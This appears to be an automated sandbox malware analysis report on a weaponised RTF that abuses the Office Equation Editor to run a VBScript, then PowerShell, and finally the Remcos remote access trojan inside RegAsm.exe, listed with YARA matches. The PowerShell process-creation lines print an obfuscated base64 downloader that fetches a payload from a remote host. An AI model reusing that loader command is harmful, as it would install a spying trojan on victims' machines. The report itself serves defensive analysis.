Source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 3212, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Very long command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8770
Source: C:\Windows\SysWOW64\wscript.exe	Process created: Commandline size = 8770			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

11_2_004167B4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_003054A0	8_2_003054A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043E0CC	11_2_0043E0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041F0FA	11_2_0041F0FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00454159	11_2_00454159
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00438168	11_2_00438168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004461F0	11_2_004461F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043E2FB	11_2_0043E2FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0045332B	11_2_0045332B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042739D	11_2_0042739D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004374E6	11_2_004374E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043E558	11_2_0043E558
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00438770	11_2_00438770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004378FE	11_2_004378FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00433946	11_2_00433946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044D9C9	11_2_0044D9C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00427A46	11_2_00427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041DB62	11_2_0041DB62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00427BAF	11_2_00427BAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00437D33	11_2_00437D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00435E5E	11_2_00435E5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00426E0E	11_2_00426E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0043DE9D	11_2_0043DE9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00413FCA	11_2_00413FCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00436FEA	11_2_00436FEA

Source: ~WRF{6C8F4896-7948-479F-8EE2-C642D1E95148}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00401E65 appears 34 times

Source: SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 8.2.powershell.exe.4179110.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 8.2.powershell.exe.4179110.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000008.00000002.391262548.0000000003F96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2040, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2824, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 3212, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winRTF@14/17@299/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

11_2_00417952

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

11_2_0040F474

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

11_2_0041B4A8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_0041AA4A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.ShellCode.69.19968.913.rtf

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-76C83U
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR79FF.tmp

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\luckymokeykissinglover.vbs"

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................s.l.m.g.r...v.b.s........................D......................@.........................................D.....	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................@...............w.i.n.r.m...v.b.s........................D......................@.........................................D.....	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................ . . . . . . . .1. .f.i.l.e.(.s.). .c.o.p.i.e.d.................0.......................6.................D.....	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
